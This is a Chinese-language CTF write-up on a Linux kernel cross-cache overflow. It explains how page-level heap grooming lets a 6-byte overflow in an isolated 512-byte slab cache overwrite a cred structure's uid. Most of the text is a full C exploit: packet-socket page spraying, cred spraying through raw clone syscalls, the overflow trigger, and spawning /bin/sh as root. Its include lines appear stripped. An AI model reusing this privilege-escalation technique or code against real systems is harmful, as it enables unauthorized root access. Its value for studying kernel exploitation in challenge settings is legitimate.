什么叫 Cross Cache 呢?其实就是字面意思,我们知道内核中的大部分结构体都有自己的专属 slab 内存池。那现在我们可以想象一下这个场景,我们拥有一个特定 kmem-cache 的溢出漏洞,那么我们该如何利用呢?
启动脚本不用看了,该开的保护都开了。而作者将 config 给了我们,所以我们可以看下部分编译选项。
# CONFIG_SLAB is not set
# CONFIG_SLAB_MERGE_DEFAULT is not set
CONFIG_SLAB_FREELIST_RANDOM=y
CONFIG_SLAB_FREELIST_HARDENED=y
CONFIG_MEMCG=y
CONFIG_MEMCG_KMEM=y
# CONFIG_DEBUG_CREDENTIALS is not set
驱动程序单独创建了一个 kmem-cache,而该 kmem-cache 是独立的,不会与其他 kmem-cache 合并,且大小为 512 字节。
ioctl 函数中有增加堆块和修改堆块的功能
修改堆块时,有白给了 6 字节溢出
上面的堆块都是针对 castaway_cache 的 object,而该 cache 是与其他 cache 隔离的,所以从 slub 层面去考虑,我们会发现无法利用该漏洞。
而我们知道 slub 是从伙伴系统申请的内存,然后在划分成一个一个的 object 去使用。 而伙伴系统的内存是连续的,所以我们可以通过页级堆风水去形成如下内存布局(图片来自wiki):
然后就形成了 cross-cache overflow 啦。
这里 victim object 选择谁呢?6字节我们是可以修改 cred 的 uid 的,所以直接打 cred。
我们可以知道 CONFIG_DEBUG_CREDENTIALS 这个编译选项是没有设置的,所以可以直接溢出到 uid 的低两个字节,但是这是足够的。
其他的见 ctf-wiki 即可,也没啥好说的了,也不想浪费时间去写一些垃圾。
exp:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define PACKET_VERSION 10
#define PACKET_TX_RING 13
#define PGV_PAGE_NUM 1000
#define CRED_SPRAY_NUM 1066
#define VUL_OBJ_NUM 400
#define VUL_OBJ_SIZE 512
int fd;
int cmd_pipe_req[2], cmd_pipe_reply[2], check_root_pipe[2];
char binsh_str[] = "/bin/sh";
char* shell_args[] = { binsh_str, NULL };
char buf[1];
struct timespec timer = {
.tv_sec = 23535670,
.tv_nsec = 0,
};
struct node {
size_t idx;
size_t size;
char* ptr;
};
void add()
{
ioctl(fd, 0xCAFEBABE, NULL);
}
void edit(size_t idx, size_t size, char* ptr)
{
struct node n = { .idx = idx, .size = size, .ptr = ptr };
ioctl(fd, 0xF00DBABE, &n);
}
void err_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(5);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}
void line(char *msg)
{
printf("\033[34m\033[1m\n[*] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
/* bind the process to specific core */
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
struct tpacket_req {
unsigned int tp_block_size;
unsigned int tp_block_nr;
unsigned int tp_frame_size;
unsigned int tp_frame_nr;
};
enum tpacket_versions {
TPACKET_V1,
TPACKET_V2,
TPACKET_V3,
};
/* each allocation is (size * nr) bytes, aligned to PAGE_SIZE */
struct pgv_page_request {
int idx;
int cmd;
unsigned int size;
unsigned int nr;
};
enum {
CMD_ALLOC_PAGE,
CMD_FREE_PAGE,
CMD_EXIT,
};
/* create an isolate namespace for pgv */
void unshare_setup(void)
{
char edit[0x100];
int tmp_fd;
unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);
tmp_fd = open("/proc/self/setgroups", O_WRONLY);
write(tmp_fd, "deny", strlen("deny"));
close(tmp_fd);
tmp_fd = open("/proc/self/uid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getuid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
tmp_fd = open("/proc/self/gid_map", O_WRONLY);
snprintf(edit, sizeof(edit), "0 %d 1", getgid());
write(tmp_fd, edit, strlen(edit));
close(tmp_fd);
}
/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
struct tpacket_req req;
int socket_fd, version;
int ret;
socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
printf("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
ret = socket_fd;
goto err_out;
}
version = TPACKET_V1;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
&version, sizeof(version));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_VERSION)\n");
goto err_setsockopt;
}
memset(&req, 0, sizeof(req));
req.tp_block_size = size;
req.tp_block_nr = nr;
req.tp_frame_size = 0x1000;
req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
if (ret < 0) {
printf("[x] failed at setsockopt(PACKET_TX_RING)\n");
goto err_setsockopt;
}
return socket_fd;
err_setsockopt:
close(socket_fd);
err_out:
return ret;
}
/* parent call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_ALLOC_PAGE,
.size = size,
.nr = nr,
};
int ret;
write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
read(cmd_pipe_reply[0], &ret, sizeof(ret));
return ret;
}
/* parent call it to send command of freeing to child */
int free_page(int idx)
{
struct pgv_page_request req = {
.idx = idx,
.cmd = CMD_FREE_PAGE,
};
int ret;
write(cmd_pipe_req[1], &req, sizeof(req));
read(cmd_pipe_reply[0], &ret, sizeof(ret));
return ret;
}
/* child thread's handler for commands from the pipe */
void spray_cmd_handler(void)
{
struct pgv_page_request req;
int socket_fd[PGV_PAGE_NUM];
int ret;
/* create an isolate namespace*/
unshare_setup();
/* handler request */
do {
read(cmd_pipe_req[0], &req, sizeof(req));
if (req.cmd == CMD_ALLOC_PAGE) {
ret = create_socket_and_alloc_pages(req.size, req.nr);
socket_fd[req.idx] = ret;
} else if (req.cmd == CMD_FREE_PAGE) {
ret = close(socket_fd[req.idx]);
} else {
printf("[x] invalid request: %d\n", req.cmd);
}
write(cmd_pipe_reply[1], &ret, sizeof(ret));
} while (req.cmd != CMD_EXIT);
}
__attribute__((naked)) int __clone(int flags, int (*fn)(void*))
{
/*
res = clone(flags, 0, 0, 0, 0, 0)
if (res == 0) fn();
else return;
*/
__asm__ volatile(
"mov r15, rsi;"
"xor rsi, rsi;"
"xor rdx, rdx;"
"xor r8, r8;"
"xor r9, r9;"
"xor r10, r10;"
"mov rax, 56;"
"syscall;"
"cmp rax, 0;"
"je CHILD;"
"ret;"
"CHILD:"
"jmp r15;"
);
}
int wait_for_root(void* args)
{
/*
read(check_root_pipe[0], buf, 1); <== 等待检查信号
if (getuid() == 0) execve("/bin/sh", args, NULL);
else return;
*/
__asm__ volatile(
"lea rax, [check_root_pipe];"
"xor rdi, rdi;"
"mov edi, dword ptr [rax];"
"mov rsi, buf;"
"mov rdx, 1;"
"xor rax, rax;"
"syscall;"
"mov rax, 102;"
"syscall;"
"cmp rax, 0;"
"jne failed;"
"lea rdi, [binsh_str];"
"lea rsi, [shell_args];"
"xor rdx, rdx;"
"mov rax, 59;"
"syscall;"
"failed:"
"lea rdi, [timer];"
"xor rsi, rsi;"
"mov rax, 35;"
"syscall;"
);
return 0;
}
int main(int argc, char** argv, char** env)
{
char buffer[0x1000];
bind_core(0);
fd = open("/dev/castaway", O_RDWR);
if (fd < 0) err_exit("open /dev/castaway");
pipe(cmd_pipe_req);
pipe(cmd_pipe_reply);
pipe(check_root_pipe);
if (!fork())
{
spray_cmd_handler();
exit(EXIT_SUCCESS);
}
info("STEP.I Spray pgv pages");
for (int i = 0; i < PGV_PAGE_NUM; i++)
if (alloc_page(i, 0x1000, 1) < 0)
err_exit("alloc_page");
info("STEP.II Free for cred pages");
for (int i = 1; i < PGV_PAGE_NUM; i += 2) free_page(i);
info("STEP.III Spray cred to fetch pages");
for (int i = 0; i < CRED_SPRAY_NUM; i++)
if (__clone(CLONE_FILES|CLONE_FS|CLONE_VM|CLONE_SIGHAND, wait_for_root) < 0)
err_exit("__clone");
info("STEP.IV Free for vulnerable pages");
for (int i = 0; i < PGV_PAGE_NUM; i += 2) free_page(i);
info("STEP.V Triger overflow write 6 bytes");
memset(buffer, '\0', 0x1000);
*(uint32_t*)&buffer[VUL_OBJ_SIZE-6] = 1;
for (int i = 0; i < VUL_OBJ_NUM; i++)
{
add();
edit(i, VUL_OBJ_SIZE, buffer);
}
info("CHILD PROCESS CHECK");
write(check_root_pipe[1], buffer, CRED_SPRAY_NUM);
sleep(23535670);
return 0;
}
效果如下: